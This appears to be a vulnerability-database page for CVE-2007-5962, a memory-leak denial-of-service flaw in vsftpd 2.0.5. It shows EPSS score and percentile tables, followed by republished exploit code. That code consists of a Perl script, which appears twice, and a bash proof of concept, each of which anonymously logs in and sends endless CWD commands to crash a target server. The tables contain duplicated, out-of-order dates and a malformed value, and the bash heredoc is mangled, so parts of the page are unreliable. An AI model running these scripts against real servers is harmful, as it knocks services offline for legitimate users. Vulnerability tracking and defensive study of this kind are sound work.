CVE-2007-5962 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	12.57%	–	–
2022-04-03	–	–	12.57%	–	–
2023-02-26	–	–	12.57%	–	–
2023-03-12	–	–	–	10.95%	–
2023-05-28	–	–	–	5.98%	–
2023-08-20	–	–	–	5.98%	–
2024-01-07	–	–	–	5.69%	–
2024-06-02	–	–	–	5.69%	–
2024-10-13	–	–	–	5.69%	–
2024-12-22	–	–	–	5.18%	–
2025-01-12	–	–	–	5.07%	–
2025-02-16	–	–	–	5.94%	–
2025-03-09	–	–	–	5.94%	–
2025-01-19	–	–	–	5.07%	–
2025-02-16	–	–	–	5.94%	–
2025-03-09	–	–	–	5.94%	–
2025-03-18	–	–	–	–	17.79%
2025-03-30	–	–	–	–	18.01%
2025-03-30	–	–	–	–	18.01,%

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Date	Percentile
2022-02-06	9%
2022-04-03	95%
2023-02-26	96%
2023-03-12	94%
2023-05-28	92%
2023-08-20	93%
2024-01-07	93%
2024-06-02	93%
2024-10-13	94%
2024-12-22	93%
2025-01-12	93%
2025-02-16	93%
2025-03-09	94%
2025-01-19	93%
2025-02-16	93%
2025-03-09	94%
2025-03-18	95%
2025-03-30	95%
2025-03-30	95%

#!/usr/bin/perl -w ####################################################################################### # vsftpd 2.0.5 FTP Server on Red Hat Enterprise Linux (RHEL) 5, Fedora 6 to 8, # Foresight Linux, rPath Linux is prone to Denial-of-Service(DoS) vulnerability. # # Can be xploited by large number of CWD commands to vsftp daemon with deny_file configuration # option in /etc/vsftpd/vsftpd.conf or the path where FTP server is installed. # # I tried to modify local exploit found at securityfocus such that we can remotely exloit # # Author shall not bear any responsibility # Author: Praveen Darshanam # Email: praveen[underscore]recker[at]sify.com # Date: 07th June, 2008 # # ######################################################################################## use Net::FTP; $ftp=Net::FTP->new("$ARGV[0]",Debug=>0) || die "Cannot connect to Host $ARGV[0]\n Usage: $perl script_name.pl target_ip\n"; $ftp -> login("anonymous","anonymous") || die "Could not Login...Retry"; while(1) { #this loop runs infinitely $ftp -> cwd(); } $ftp->quit; # milw0rm.com [2008-06-14]

source: https://www.securityfocus.com/bid/29322/info The 'vsftpd' FTP server is prone to a remote denial-of-service vulnerability because it fails to free allocated memory. Successfully exploiting this issue allows remote attackers to crash the affected application, denying service to legitimate users. # echo deny_file=foo >> /etc/vsftpd/vsftpd.conf # service vsftpd restart $ cat > memtest.sh <<EOF EOF #!/bin/bash echo USER anonymous echo PASS foo@bar.com while [ 1 ]; do echo CWD pub echo CWD .. done EOF

source: https://www.securityfocus.com/bid/29322/info The 'vsftpd' FTP server is prone to a remote denial-of-service vulnerability because it fails to free allocated memory. Successfully exploiting this issue allows remote attackers to crash the affected application, denying service to legitimate users. #!/usr/bin/perl -w ####################################################################################### #vsftpd 2.0.5 FTP Server on Red Hat Enterprise Linux (RHEL) 5, Fedora 6 to 8, #Foresight Linux, rPath Linux is prone to Denial-of-Service(DoS) vulnerability. # #Can be xploited by large number of CWD commands to vsftp daemon with deny_file configuration #option in /etc/vsftpd/vsftpd.conf or the path where FTP server is installed. # #I tried to modify local exploit found at securityfocus such that we can remotely exloit # # Author shall not bear any responsibility #Author:Praveen Darshanam #Email:praveen[underscore]recker[at]sify.com #Date:07th June, 2008 # # ######################################################################################## use Net::FTP; $ftp=Net::FTP->new("$ARGV[0]",Debug=>0) || die "Cannot connect to Host $ARGV[0]\n Usage: $perl script_name.pl target_ip\n"; $ftp -> login("anonymous","anonymous") || die "Could not Login...Retry"; while(1) { #this loop runs infinitely $ftp -> cwd(); } $ftp->quit;